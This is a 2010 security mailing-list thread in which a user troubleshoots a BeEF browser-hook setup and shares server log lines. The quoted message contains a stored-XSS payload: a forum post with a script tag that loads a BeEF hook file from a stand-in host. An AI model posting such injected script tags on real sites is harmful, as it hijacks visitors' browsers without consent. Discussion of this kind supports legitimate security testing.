[WEB SECURITY] beef question

Alex Fiuvertiz fiuvertiz at gmail.com
Thu Jun 17 06:41:38 EDT 2010


The source code shows up in the browser (when right-clicking->show source) as:
<script language="Javascript"

I've attached an image of what the UI on the server looks like when
the forum post has been made. The version deployed is

x.x.x.x - - [17/Jun/2010:12:33:55 +0200] "GET
/beef/hook/beefmagic.js.php HTTP/1.1" 200 3849

The following request comed in every one second approx:
x.x.x.x - - [17/Jun/2010:12:33:55 +0200] "GET
/beef/ui/get_zombie_details.php?zombie=all&detail=list HTTP/1.1" 200 4

/ Alex

2010/6/16 Dan Anderson <dan-anderson at cox.net>:
> Sorry, I see your other posting now.
>>When I instead do a forum post with:
>><script src="http://www.example.com/beef/hook/beefmagic.js.php"></script>
>>...the Zombie doesn't show up (when I visit the forum post). But the
>>server gets the request (and is answering with a 200 OK).
> When you go to the forum page.  What does the page source (right click
> - view source) look like for your post?  Do you see, "<script
> src="http://www.example.com/beef/hook/beefmagic.js.php"></script>"
> embedded, unmodified in the html source?
> What does your server log look like?  Is the request for
> "http://www.example.com/beef/hook/beefmagic.js.php"?
> Dan
> On Wed, Jun 16, 2010 at 3:39 AM, Dan Anderson <dan-anderson at cox.net> wrote:
>> So, is the problem you are having that the zombies are not showing up
>> under the "BeEF" cow?
>> Are they showing up at all (i.e. in the zombies menu?)
>> Dan
>>> / Alex
-------------- next part --------------
A non-text attachment was scrubbed...
Name: beef_result.JPG
Type: image/jpeg
Size: 94485 bytes
Desc: not available
URL: <http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/attachments/20100617/361dacc7/attachment.JPG>
-------------- next part --------------
Join us on IRC: irc.freenode.net #webappsec

Have a question? Search The Web Security Mailing List Archives: 

Subscribe via RSS: 
http://www.webappsec.org/rss/websecurity.rss [RSS Feed]

To unsubscribe email websecurity-unsubscribe at webappsec.org and reply to 
the confirmation email

Join WASC on LinkedIn

More information about the websecurity mailing list